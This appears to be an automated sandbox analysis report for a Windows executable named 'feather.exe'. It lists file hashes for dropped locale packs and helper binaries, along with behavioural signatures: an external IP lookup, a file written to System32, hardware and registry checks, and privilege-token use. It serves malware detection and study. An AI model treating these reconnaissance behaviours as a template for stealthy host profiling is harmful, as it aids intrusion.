SHA1 2e3977403a204c6f0ca9a6856bb1734490a57e72
SHA256 844031e1de2b2872d12d5b7d42adf633c9d4b48169b1b33b7492b3b060c73558
SHA512 90294ae24b7db003bc34a48f98d9e1887e87c6f605defe01ddcf9187429e8446c04a7f94bb6aadc8e61c98842163bc3702b414393ab836eb0bee038f09481c2b

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\sk.pak

MD5 f117e58e6eb53da1dbfa4c04a798e96f
SHA1 e98cee0a94a9494c0cfc639bb9e42a4602c23236
SHA256 b46db20eeba11f8365296b54469fdd001579852dc1d49a01fc59d2a8bcf880a3
SHA512 dea792a63e0557d9e868c0310ec2a68b713daf5cf926389e05a0885cdb05433d20f35d087de269f9584795da50600966b8ff5dd95583861443a1e90564a89793

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ru.pak

MD5 1a9b38ec75ccfa3214bef411a1ae0502
SHA1 de81af03fff427dfc5ffe548f27ed02acae3402d
SHA256 533f9e4af2dce2a6e049ac0eb6e2dbf0afe4b6f635236520aee2e4fa3176e995
SHA512 05cf20aea71cdd077b0fa5f835812809ad22c3dbebc69e38ab2c9a26ad694ab50d6985aec61633b99713e7f57408c1c64ce2fb9ccdac26661b7167853bdd6148

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ro.pak

MD5 4e692489e2ae74a4a11ca0a113048f15
SHA1 cb2b80217d5372242d656ac015c024fe1e5e77b7
SHA256 4a2a305668f1926cfe4bb72e8fbfde747c83ac4dd9cf535c13ae642d0b96fb79
SHA512 8ad9e0a79137a862def24d6963536e75b87bb71ab74dbdd43531c5c95ddd3cd834f22c6a8e3a1e03aad35ade65ecd227d5101b5be3ce3f0b7b471f5136cfd77c

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\sl.pak

MD5 435a2a5214f9b56dfadd5a6267041bd3
SHA1 36bbc7ca3d998bfb1edc2ff8a3635553f96ca570
SHA256 341c33514c627501026c3e5b9620cf0d9f482ab66b10a7e0fb112c7620b15600
SHA512 55271935e18ac27c753431af86a7dcd1f4a768adef1b593ba8e218da34856a5f9faf9819a3ecce3f21f0607ba95100c5cb18cd1a7138ec563090d0391ad5b52d

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\pt-PT.pak

MD5 0237374730fa1a92dec60c206d7df283
SHA1 62dbbd855d83ef982a15c647b5608dafb748745a
SHA256 2fb2fd2e32b952dcbc8914f9d3aaf02bf2750b72abfee2e8b2bb08062ddd9934
SHA512 63ec4ec44002724e22703a3bd952d1ff4062b367c4f5e3f106349bd226ad1317bef2e371fda0e099ea5c0afd32a9d2c1246c93c18d73dccf8fc2c1644a6fb6b2

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\pt-BR.pak

MD5 53d5fb849c9bab70878b3e01bffad65a
SHA1 e72af1a76539e66cef4a4eef5844b067a4e1a79f
SHA256 40dd24c5e225ed941bbaab3dcfefa993e39fbc75a1798f4f6e06424956698ac5
SHA512 55357643d789d2eed72e009f08f72ba4895ba455ca00c8347a3c3790e43f8d7e4625feda438ecac840bdc52c26d2135d89bea693b61a293922b6056bde6b4516

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\sr.pak

MD5 8f58b2463e8240ef62e651685e1f17d8
SHA1 6c9f302aed807a67f6b93bcb79577397a5ad3cf7
SHA256 5a55320d6953efb5b565893e32e01f6dae781a16460df5502c8ba012c893edfd
SHA512 6076d43a73d5fa5192cbe597e018b268cfdc7efb94a6cb45dad5b0da9c3abf68aaf2ea06f3ad650b28a993605917b6d356339d79f8dd6962d2c40dbf4653ef83

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\tr.pak

MD5 55e06cd9356d0fb6f99932c2913afc92
SHA1 aa5c532ddb3f80d2f180ad62ce38351e519a5e45
SHA256 afcbf02420dc724059f70d1dc6ffa51f5dd75136d9e1e8671d92d5d14955edf9
SHA512 813c180cb1aa205034497be5fc8a631ff117e5ed17cdf0ac59b7569d74d849b385852a15bbadd3146f942c58bab80d94bf0980d13ca4b4424d1cb1df0cb1a2cd

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\zh-TW.pak

MD5 f466116c7ce4962fe674383d543c87f6
SHA1 f65bf0dc1f1b15c132674fb8ff540f7d2afe1d6e
SHA256 ff3a294fd1afb1fa7aaf53fbc4396643a12ed132633c5c86f14c16b88fa94a7b
SHA512 4851a08069fcac75e4051e53d4526789bfe6c393ab963e8263803bbf6e96cb150e9ba741650efb5ee500e8a757d8512eb17dc268cec1ab6fd3acfac62f7da27d

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\zh-CN.pak

MD5 3210460a24f2e2a2edd15d6f43abbe5f
SHA1 608ff156286708ed94b7ae90c73568d6042e2dbd
SHA256 0f8d42d7f0b0b01aafad6ae79f0bd0ca518b2db94287b09df088bc093f15f605
SHA512 f97427dba4217e01a7ed395c453d03dda4f2258cba589258da0eacfde427bf442cddef541a23e7782914433e70a9623e904a5070deba9f9d50dda20732eb5e86

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\vi.pak

MD5 4076d3c0c0e5f31cf883198c980d1727
SHA1 db51b746216ea68803c98d7c1a5a2b45944359f3
SHA256 f1458c4ce4ca708e849eb0c68a5157360ef003f3a9c95628d5ca12ada303b379
SHA512 80e4e960218f7d84423124c34352251411baf008e821a344a0b6c2e7f1483694010f28b7de21c7e2c69abb4ec92e0d9cbddeed6279b90c47245f4cbc500cdb77

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ur.pak

MD5 861ffd74ae5b392d578b3f3004c94ce3
SHA1 8a4a05317a0f11d9d216b3e53e58475c301d7ea5
SHA256 b9f22a23368bf1e21f3085583ecb775cce8045176721ff6ae798b06bd2810dbc
SHA512 52ede35b7ed1fb6e51b18e450b95c3245d326f2afda646e3642ee68b714dcf9a726afe32e2759e9ea87a104f4a59e6fc2c60b3275aad8332ae1c626231e6747b

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\uk.pak

MD5 381cb33c2d4fd0225c5c14447e6a84e0
SHA1 686b888228f6dd95ade94fee62eb1d75f3e0fc93
SHA256 c2a6b16abeab6e18276bc1636555e93218763b9c99cacd0b42481b35e3a11820
SHA512 f7a2828aa4cd85f07a5d66832f247f70951abf34f81a282dc41ec51875ba70d940353d010b605c56cc59bee47309aa311099d4e6ebd17f3c1538521d0cddf4b6

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\th.pak

MD5 4917873d8118906bdc08f31afb1ea078
SHA1 49440a3b156d7703533367f8f13f66ec166db6e9
SHA256 d051b400096922089f6daa723fac18c9640ba203b2879aac4ca89b05738dd32d
SHA512 30e6446bad54b86be553fa293c7a92ec221adb54b99624ed69702df75347a98697158041a45f77ece4e7ed0fda41306ef21eb27981f24f0a4e42e8306175a88e

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\te.pak

MD5 17b858cf23a206b5822f8b839d7c1ea3
SHA1 115220668f153b36254951e9aa4ef0aa2be1ffc4
SHA256 d6180484b51aacbf59419e3a9b475a4419fb7d195aea7c3d58339f0f072c1457
SHA512 7b919a5b451ec2ba15d377e4a3a6f99d63268e9be2865d674505584eed4fa190eaae589c9592276b996b7ce2fdfae80fda20feff9ea9adbb586308dfd7f12c2a

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ta.pak

MD5 5f80c9da0c09491c70123581a41f6dad
SHA1 3fc9560a954271cf09aaa54eec34963c72c06e85
SHA256 30658d99d753946e9c9c02094c89be25b710db77251df6cd1a8839c29de5f884
SHA512 072c5db7fe1eb9e6c270d0e9b439cf84ebb3dc374d4f01f01f9341030883f2d6d9c6970fb6ef14bf96fccb51eade9ca762f396f89ba1d3df1230dda68557fd4a

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\sw.pak

MD5 59ff4e16b640ef41100243857efdd009
SHA1 f712b2d39618ffadcf68d1f2ab5a76da5be14d74
SHA256 c18a209f8ec3641c90ea8ced5343f943f034e09c8e75466e24dcabc070d08804
SHA512 0e721a6cbf209ac35272ad292b2e5000d4e690062ddb498dbf6e8e6ee5f6e86d034a7303a46c2b85750245381c78efafc416ead13c1fe0ee5ec6088dd66adca2

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\sv.pak

MD5 e4c9ced1a36ea7b71634e4df9618804f
SHA1 c966c8eb9763a9147854989ea443c6be0634db27
SHA256 e5cccdb241938f4a6b9af5a245abe0e0218c72e08a73db3ed0452c6ddfb9c379
SHA512 d07a4d62f22a1830d3ec44f0c347e4a7d70b35ceba126cbdc246a7b3ee7eda85e2338bab3edc7223f579964868136bb10d42c05e0e0ff9f73447b3606d9b2c4e

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\pl.pak

MD5 ba7a9aba68211d8639dffae0ef8b88da
SHA1 a9a26b8f0902475cb576967cbe9013028cb21da4
SHA256 60aa08598a81bb46ddc64a5ab0852565554c6e6262e9c5dfee09f4e3fc08d5fe
SHA512 a1b8bfc3e19aa1267e31838e1c1f2b0b1cfcdf56f84e967088d626b58ec64b3305043a14b12fd080498ee1d74a4192453914c393ce8f848ea5616cf88abc4eb5

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\nb.pak

MD5 28cc86c7204b14d080f661a388e7f2c0
SHA1 e0927ea3c4fd6875dafd7946affb74ad2db400f5
SHA256 9253122d94ccea904fb9363b8178ca9335b8380b7891f1a7a22afb3113309e72
SHA512 e2524e10d145f95c028d65e47cf06fc82c7a43fcf0ecf01202278c7fb14079c03e9434e8039fd96aaee870872c9896d9f0ed575e50c19a3781cb0c94fe59b3a5

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ms.pak

MD5 73096184d7bd6a9a2a27202d30a3cfa1
SHA1 ea711b29787aa8b9e9af6bde5b74103429e5855f
SHA256 d1072514bab63af5dfbf923175d491787139f0c1b6361acb23e67543836c84ba
SHA512 e3fbee4896554e502c222b5ffe38e9d61e9db4d18cdc92ce5118b819dc60789bfd6d6c7f8444ff1763222455ab91e79bfe500e75c0e06b0de70c2c64fb043c6f

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\mr.pak

MD5 fda40999c6a1b435a1490f5edca57ccd
SHA1 41103b2182281df2e7c04a3fff23ec6a416d6aa9
SHA256 0ebb125a0bdfd1e21b79914ca8e279790d41f7bac35bf2d031dd7981f1c1c056
SHA512 666ceb24d2e568a00a77512295e224a6545bf6abcfa19c93aa823db5330117fcb39fde570e7601dbd41976950c3ec03634f89fc5d9203357515e6651ab0b6d32

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ml.pak

MD5 6e96eddfe80da6aaa87f677feef4d1d6
SHA1 8a998785d56bc32b15cee97b172cd2dcdc8508d9
SHA256 e2fb73353ab05eb78f9845bdbdf50b64c9fb776b7f08948f976fe64e683397c4
SHA512 feea11dfc6ec153ab903b5828306617eedeee19daa73bd046ae47757795fecb9abce6192bb3a9561aaace7fc85ee442057b93081c6c986855b819fd38815e6f7

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\lv.pak

MD5 e75cdda386dd3131e4cffb13883cda5f
SHA1 20e084cb324e03fd0540fff493b7ecc5624087e9
SHA256 ae782f1e53201079ca555baa5ec04b163188e5161242d185f04a606a49fc8c0d
SHA512 d27bc61028031946ed6708918f921c3d681c8962b8d5507a91ab6576e3b2c462524e550305db87ede886e41fb0e49edec2d84cdbbad675282105627e01d98bf5

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\lt.pak

MD5 3e9119a712530a825bca226ec54dba45
SHA1 10f1b6bf2fa3a1b5af894d51b4eb47296c0dbc36
SHA256 3da531a9a5870315823e74b23031cb81379d2d94ae9894a7fb1d8a8ad51a2da9
SHA512 765c872cafa1b266575b0cac09dfa796cdb860bd82e1c657397fe2aada11771f306b0a1776e4d66ff41e94b153c812592430f31e7b1ff97abe7d8e6b96d321f1

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ko.pak

MD5 38a95d783d627e9a83ad636faa33c518
SHA1 cb57e8e9ef30eb2b0e47453d5ec4f29cea872710
SHA256 0d9b23e2981412d11ecea3ade8d521a073802d9431c39d72b88f62b98e50a96b
SHA512 4119b8f82107473c941c9e10b6bae97d60c9c47570cc2b40f429a95f4f5cca77eecbacd7023af439429026f6e55ad9df19998c8b98be0d04d384b310d025c0dc

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\kn.pak

MD5 32e5f528c6cee9de5b76957735ae3563
SHA1 74a86191762739d7184b08d27f716cfa30823a98
SHA256 cd297f7e872b34e63ca2d98dc2fa79085e8a2985ba8757601e4b901a3f30b013
SHA512 92d100b1289e63fd0dc65657fb4b1e16f298735e6cd066e9122d04e3b79e0d286f15fc9f1da2c3a05af528b92bde95fcfbc493c466db2d94a0749adfbf7fb8d5

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\it.pak

MD5 ab160b6e8bbaba8f8bde7e2d996f4f2e
SHA1 eb7eae28a693337b8504e3e6363087b3b113bc72
SHA256 e86ba661b3f6f7ecd2312fe90b873330c0d6516a5501a0f326875844e8d4b289
SHA512 14e8919e2f5a7ad2b3f310ffec590b221e6e0dc45f37efc57ff9b8ff7a3ca674d6f4b9bd65e49a98af6726fa953f2168e5c8e6101ed977e8c7ff4a51203f8d4d

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\id.pak

MD5 bc719b483f20e9a0b4b88969941c869d
SHA1 4d926a9aba7c350e9da8aa570a9f52534c81aa88
SHA256 f175e58be47b228803aa32d2695e2fcfaf4655b65b96fb6b539b3e59593e6799
SHA512 ddf6108888676c1a90865daaa88198b681b685d9047b0e10f5aa08daa39a628a84732a8518606176529297bec51ce8bc39e910eeffc8b88e9585fafb694c35db

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\hu.pak

MD5 b93beeb1e35a29b310500fa59983f751
SHA1 45c0b2cab4c4a820cfc2aed4b7236ddc79a0db00
SHA256 bab09c3cb80130a4a288642633c2b31ab08b1757466d9a468bc36d276079f002
SHA512 249de5b8bd7c4755caa8b9552254d353b0d885b63bd5f7c6c8e29b3f4e447c9e8d6c0e88d5aaba0b898aa26880592b3904e19ca4797a2ac1dd757aaee782c37c

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\hr.pak

MD5 af7aec4b45ead620463b732e16f63e47
SHA1 e6838c56b945c936fdb87389fdc80cdf7bc73872
SHA256 bfeeafe2f8a9f797d20c4209181c4768fbea4a61ff2dc1f57f6cd18bc872fc13
SHA512 784ff8dc6011883e931b4b8371e5ada960120931bfdf24f81648f5092fa31db1d03e5d3cf5cd16d57ea7fb7877bb25a28533085ab42bfe40dc25ca7d9cee7ade

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\hi.pak

MD5 9e1788b0f3e330baf2b9356a6c853b20
SHA1 a2f4b37a418669e2b90159c8f835f840026128d9
SHA256 c640313e10e985a58d16f928d2428ae278421a070d948733ac68fdf7312090fd
SHA512 b9a577e084f8daeb53fad0a9423661c99cab272125899a16b0b052606a2cb88f823137f3a21b5c06b10e0235321b7faca84cd759bf406fb2dd02c2f598e92cb5

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\gu.pak

MD5 225167dbdf1d16b3fafc506eb63f6d1d
SHA1 8651b77f41e3c5b019ccb124a7c8f6449a04b96c
SHA256 ff379dd77136b9b85e7e9fcb5b261ace9c6d9184af3ba2dea35b1757b9bab6d9
SHA512 a353d36a87b6608578816056647de45a456f9012d399b2cb5cb7b9de867a370fcaf1a90d293f367b9b678d13991294425abd85cf77e971afa0d3e9c316952115

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\fr.pak

MD5 d8b4bc789a0c865fb0981611fb5dcdbc
SHA1 33f9f03117f0bba56a696f2fa089ba893ee951a2
SHA256 52aa0a18ace6347b06a89e3851a1b116812c022dbe41da8942278878b5409cee
SHA512 58d19e5a3c68c901fa2a0c327a45b410ab9b9e6c39298db48eed25345453dce1a4633afe6277cf53ed558e160065b89c0e38a32caeced47e79783dbda4d74f26

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\fil.pak

MD5 7354de570c8132723c8e57c4ccb4e7c4
SHA1 177780faf460e3c8a643a4d71c7a4621345a8715
SHA256 91149190c856195fb330605686acf09c7197e5b7efe37fe2a7c76bb8fb08cc89
SHA512 a8487a6a7fd46d62e78ca4262de49e12c120268561ee61a642c45efa48116edebeb40cf9e8be229db0bbf06bb6b5457cc54399a08ee6a603e5540ef5ca482798

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\fi.pak

MD5 fe011231bbc8b3a74652f6a38f85bc88
SHA1 2b851e46738d466b3a5a470de114d15051b6eb6b
SHA256 7a3249514585491eb47fe4b579edc27ccc48761e7ad6bc11d113b257132c5dd2
SHA512 2a4e5c1409347b4b514556c81ef32c8ae118add28e3469717b13045c8424fed9b817c7988629050ed3e732e0cdca181891b6a8b9e64e4c8d65f004d7c8db9796

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\fa.pak

MD5 c770cfb9fbabda049eb2d87275071b54
SHA1 20e41b1802c82d15d41fadaf3dcd049b57891131
SHA256 dae7e7c87026cd4e8a4cd813cc71def32c86ed47865ce6da5383b66b7021c5bc
SHA512 cda117a60c853f12ade579c34fce22d992b33df1f5001a237767b6e642d5c775c3387bcee05d6557fe5a2f6235f93258954a697d3b9812d2550c4801869f4751

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\es.pak

MD5 a24e01a4947d22ce1a6aca34b6f2a649
SHA1 750c2550465c7d0d7d1d63ad045b811b4a26dc55
SHA256 848d422be1b8fae74786ed6d6dfa7dd2e97b798b4a9ba1d929085e425b2a54e0
SHA512 02fc4ce96aa523ebc204243bbec3347b09cb20bcc0ba66cf9532a6fb26c48f7f2396bbb833f1916f8f081ffc9c6cd2de07315e66c5115042a0b44270fa4468c1

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\es-419.pak

MD5 6f4613a4a88af6c8bd4ef39edeee3747
SHA1 c8850a276d390df234258d8de8c6df79240c8669
SHA256 8f7b8776e61e3ed5aa33b1a571ac834653b54b12a499d956b95d567b7e1ba987
SHA512 e5933dcb2aaaa2018ba8b13f4af3dc8a950640ac60acb1b56ad6de24541701d0ffc1f4cb28c7932af924bfd673edcee20bf649156ab95ea9499ec43c703ea141

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\en-US.pak

MD5 626f30cfd9ad7b7c628c6a859e4013bd
SHA1 02e9a759c745a984b5f39223fab5be9b5ec3d5a7
SHA256 0fd74bb69ad35b3f9391fa760bf0eb0ee73d2bea0066244577ef2abd269513de
SHA512 9ce902f21fef70c5b5af444b532b36c9a00d896878cb4021c9b1dc07aa3277d956bca65ee0adb68467eec113e535b60a8a5fb5414c7d0ca761ceae5c43b7d9a9

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\en-GB.pak

MD5 9d9121bdc9af59b5899ce3c5927b55d8
SHA1 568626a374cd30237c55b72c74b708da8d065ec1
SHA256 f4d45ccc89834376f35d4d83fe5b2d5112b8cc315fcb03228720749aae31c805
SHA512 149a8acf256dc12f62706f72ad8ec88cbfdf7f8dc874bcd9facf484cdb00e7c5787f5e1bbc12b5bbe1b19b6524e7e8a1c7dba2838abeb9aafa3ce89795fd22ae

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\de.pak

MD5 2163820cd081fdd711b9230dc9284297
SHA1 c76cc7b440156e3a59caa17c704d9d327f9f1886
SHA256 6d787033c94755cc80c187ed8a9de65808bb4d7968354bbb94b7868ac2e8d205
SHA512 920fa2a10f7aa7f1f6d911fe2a77eded0384617d8fd863943afd99a584dab3fb2ea3e5d2e20bca529689a99fdf303912007f2918c62482d8a90194a810f6e535

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\da.pak

MD5 1939faa4f66e903eac58f2564eeb910e
SHA1 bace65ee6c278d01ccf936e227e403c4dff2682d
SHA256 0b9da7bd6531a7ebe7d8188b320c0953adcfbaf654037f8265261a12e63d3c87
SHA512 51588d2fe724e6c407724ea6f46883ded39397af744effaf672f75952a6a734e61e93e59f446080317f2a2b3fa1b45e7405f90fe0b226c44c9f3dd9a4e130a87

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\cs.pak

MD5 06e3fe72fdc73291e8cf6a44eb68b086
SHA1 0bb3b3cf839575b2794d7d781a763751fe70d126
SHA256 397134d1834f395f1c467a75d84ef2e8545cb0f81e94dbe78b841fbbdaad802d
SHA512 211594c30ad4f5ca8813596b59751168c60dfa0d13f24f2aa608fce82d21c2de3de69fe007c4bde1602da8aa7ea81ec0f15e173abc1224362c36b493b425b425

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ca.pak

MD5 2d30c5a004715bc8cd54c2e21c5f7953
SHA1 fed917145a03d037a32abac6edc48c76a4035993
SHA256 d9c45d55a9a5661063b9bbebb0615de8f567f3925d04fd10938da9617c6220e0
SHA512 b3803551f53d290d8839789f829afc9c1e12052c81ba20d5e01fb3d2bacd5d1e97bd4c05074322eed17fdec04c9176c655076faec8a3aef17c39fb999e0c1fcf

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\bg.pak

MD5 a69f6075863d47b564a2feb655a2946f
SHA1 062232499ff73d39724c05c0df121ecd252b8a31
SHA256 a5eb7038ed956bad7704a722f05691474ff709dffbad92b8e31dbb869ad58334
SHA512 930ce3938aa02a8bcc609a64bd86b7e6164d63baad157a980fd079859a6bee5db87bd1f7a74a71108f8368bc9c6154bf14a2dba1abf269f572bc262614bcf1db

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\ar.pak

MD5 3c2ab7363018db1f20b90acbc305cb4c
SHA1 60b9cf453178ad0e60faf20d137a0c7eabde65c9
SHA256 3ca47b9c436723f837a53b2904b51efdf13ab6cad2f3ef4fe48a1115847eccbf
SHA512 589beb3e95e93f30341933c9b9826210e6bf3e9c1ad8f113d9d8a98fa5a526f81e454ee3357fb55d60d67a4890ce33e964ba2fa810e1771a6b7e82746492313a

C:\Users\Admin\AppData\Local\Temp\nso2BC3.tmp\7z-out\locales\am.pak

MD5 3cfd7c5bb92ab72c63e003208a9e4529
SHA1 165d2f69ab6a6e237f0fec943b5577123cefea87
SHA256 12e9e1bec1c46e5ea706157726e17a4429acf288a5754fa183bd9b4cf7d3853b
SHA512 cd7c7837d758ea66abc871503cda6fe99ff45990405e60c1133e7c1f4cb29ee69723c9558bb2d3eccb42948da57351f4f095062616686ab2e255acd3c86236f0

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-11 17:49

Reported

2024-06-11 17:55

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\feather.exe"

Signatures

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
